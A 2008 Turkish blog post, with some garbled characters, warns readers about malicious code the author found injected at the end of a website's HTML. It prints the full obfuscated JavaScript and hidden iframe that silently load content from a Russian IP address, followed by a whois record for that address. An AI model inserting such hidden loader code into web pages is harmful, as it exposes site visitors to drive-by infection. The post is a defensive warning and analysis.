HEUR/HTML.Malware Virüsüne dikkat…
Pazartesi, Nisan 21st, 2008 Merhaba arkadaÅŸlar bir internet sayfasında surf yaparken denk geldim… HTML kodları arasına bulaÅŸan bu virüsü bir kısım antivirüs programları algılamıyor malesef. Åžuan deneme amaçlı kulllandığım Antivir programı hemen beni uyardı. SöylediÄŸim gibi sörf yaparken denk geldim bu uyarıya.. Öncelikle birkaç antivirüs programı ile kontrol ettim ama yakalamadılar. Sadece Antivir mi yakalıyor ? O zaman bir yanlış anlaşılma olabilir dedim.
Yanlış bir alarm olup olmadığını kontrol için hemen eplorer de saÄŸ tıklayıp kaynağı görüntüle yaptım… HTML kodlarını yukarıdan aÅŸağıya doÄŸru inerken </body> </html> kodlarından sonra aÅŸağıdaki kodlara denk geldim…
</body>
</html>
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe> <script> function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.length; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} document.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A363930292B2733383037353537655C272077696474683D3639206865696768743D3130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); </script>
Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe>
Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir ÅŸekilde fark etmiyor…
Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.
http://77.221.133.X/.if/go.html?[random_nr]
Scrip çalıştığında bu hale geliyor…
İp adresini sorguladığımda ise
Results:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the “-B” flag.
% Information related to ‘77.221.128.0 - 77.221.143.255′
inetnum: 77.221.128.0 - 77.221.143.255
netname: DATAPOINT-NET2
descr: Colocation and virtual hosting
descr: For abuse, spam an other comliants mailto:abuse@infobox.ru
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
status: ASSIGNED PA
mnt-by: INFOBOX-MNT
source: RIPE # Filtered
person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
e-mail: abuse@infobox.ru
phone: +7 812 3312999
nic-hdl: IBA-RIPE
mnt-by: INFOBOX-MNT
source: RIPE # Filtered
% Information related to ‘77.221.128.0/19AS30968′
route: 77.221.128.0/19
descr: DATACENTER2
origin: AS30968
mnt-by: INFOBOX-MNT
source: RIPE # Filtered
Rusyada bir datacenter karşıma çıkıyor. Aman dikkat işin içerisinde RUSLAR varsa dikkat etmek lazım:)
Script çalıştığında çıkan sonuç..
<iframe src=”http://77.221.133.X/.dif/go.php?sid=1″ style=”border:0px solid gray;” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>Tavsiyem bu virüsü yakalayabilen bir anti-virüs programı ile sisteminiizi taratmanızdır. Birdefender ve Antivir bizzat denedim yakalayabiliyor.. Çok tehlikeli bir virüs deÄŸil.Tam olarakda sistemde yani windows’ta ne yapıyor bilmiyorum. Bunuda biraz araÅŸtıracağım. Tabi öncelikle kendi sistemime bulaÅŸtırdığım bu virüsü kaldıracağım sonrada site sahibini uyaracağım. Eminim farkında bile deÄŸildir….
SONUÇ :
En iyi virüs programı yoktur…
Birçok program iyidir fakat en iyisi diye bir belirleme yapamayız.
Bazıları anti-virüslerde iyidir trojanlarda zayıf bazıları trojanlarda çok iyidir fakat virüslerde zayıf bazılarıda güvenlik duvarında iyidir fakat diÄŸer yönleri zayıf olabilir…
Son Yorumlar